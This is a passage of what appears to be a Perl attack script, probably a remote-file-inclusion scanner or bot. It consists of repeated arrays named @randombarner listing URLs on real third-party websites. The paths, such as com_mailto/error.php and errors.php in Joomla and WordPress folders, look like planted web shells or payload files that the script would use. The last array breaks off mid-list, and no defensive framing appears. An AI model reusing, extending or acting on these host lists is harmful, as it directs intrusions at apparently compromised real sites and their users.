  267. my @randombarner6  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  268.  
  269. my @randombarner7  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  270.  
  271. my @randombarner8  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  272.  
  273. my @randombarner9  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  274.  
  275. my @randombarner10  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  276.  
  277. my @randombarner11  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  278.  
  279. my @randombarner12  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  280.  
  281. my @randombarner13  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  282.  
  283. my @randombarner14  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  284.  
  285. my @randombarner15  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  286.  
  287.  
  288.  
  289. my @randombarner16  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","